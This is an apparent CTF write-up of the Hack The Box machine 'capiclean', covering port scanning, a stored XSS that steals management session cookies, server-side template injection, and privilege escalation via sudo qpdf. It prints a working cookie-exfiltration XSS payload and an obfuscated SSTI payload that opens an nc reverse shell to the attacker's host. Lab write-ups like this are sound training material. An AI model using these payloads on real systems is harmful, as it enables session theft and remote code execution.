Introduction
I need to work on my web penetration testing and Linux privilege escalation every now and then or I forget my essential skills. (I simply prefer Windows exercises more.) Luckily, today’s machine wasn’t too difficult, and it had some XSS client-side attacks I just practiced while getting a foothold on Headless.
Enumeration / Initial Foothold
I start with some enumeration:
rustscan 10.10.11.12 --range 1-65535 -- -A -sC -sV | tee nmap.txt
sudo $(which autorecon) 10.10.11.12 -v --exclude-tags="dirbuster,nikto,smbmap" -p 22,80
Then add capiclean.htb to hosts, so we can reach the web page.
I look for interesting directories: feroxbuster -u http://capiclean.htb --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --quiet -o ferox.txt
Which brings me to the /quote page.
Fortunately, after the lessons learned from the “Headless” CTF I did earlier today, the next page is a very clear direction.
“Sent to the management team” implies we should attempt a client side attack. So after some trial and error, we can use a stored XSS attack to hijack the session cookies of the management team. Simply put this in the service field of the POST data (replace the IP and port accordingly, I’ve already URL encoded the payload): <img+src%3dx+onerror%3d"location.href%3d'http%3a//10.10.14.2%3a4444/%3fc%3d'%2b+document.cookie">
Then ensure your python server is up to catch the cookie.
Using this cookie, we can navigate to the previously forbidden /dashboard:
For this next step, you may have to maximise your browser window. I spent 2 hours trying to exploit other parts of the application before I read on the machine’s discussion that it didn’t work unless it was maximised.
Navigate to Generate QR.
This page allows you to generate QR codes from invoice IDs and invoices from QR links – however, we won’t be requiring the functionality of the other modules to exploit this.
The qr-link field is vulnerable to Server Side Template Injection, as we can see here by using the payload {7*7}.
After mass trial and error, this site showed me some payloads I could to execute command using Python’s OS functions. I used this payload to execute a nc mkfifo reverse shell to reach out to my pwncat-cs listener: {{ request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.14.2%20443%20%3E%2Ftmp%2Ff')['read']() }}
Privilege Escalation
As www-data, I executed Linux Smart Enumeration – and was promptly surprised to find access to the user consuela’s mail folder.
But that doesn’t really tell us anything. More extended recon, and I find something that’s potentially useful in the app.py file in the /opt folder.
We can leverage this for MySQL access:
and dump creds:
and promptly crack them:
Ironically, the password is “simple and clean”. We can use this to pivot to consuela:
Who has sudo privileges for qpdf.
Reading up on it’s functionality, it allows us to read the contents of files as command line options.
Reading the first line of the root flag is technically all we need, but I don’t feel comfortable posting a writeup without a legitimate route to administrative access.
Reading further into the options, we can read entire files using the –add-attachment option. It allows us to append entire files to the main output file as “attachments”. So we can output the root SSH key and use it to log back in as root.
Lessons Learned:
- Read the HTML of sites if they look tricky – going too fast is what caused the full-screen issue before. Slow but steady is good, but fast and sloppy is not.
- Always read the application code when you can.
- Update web applications – don’t let outdated versions expose you to XSS and SSTI.
- Confusing and complicated site logic like this one will likely lead to security issues as seen above, if not outright vulnerabilities.
Song Of The Day – How Blue Can You Get? by B.B. King (1971)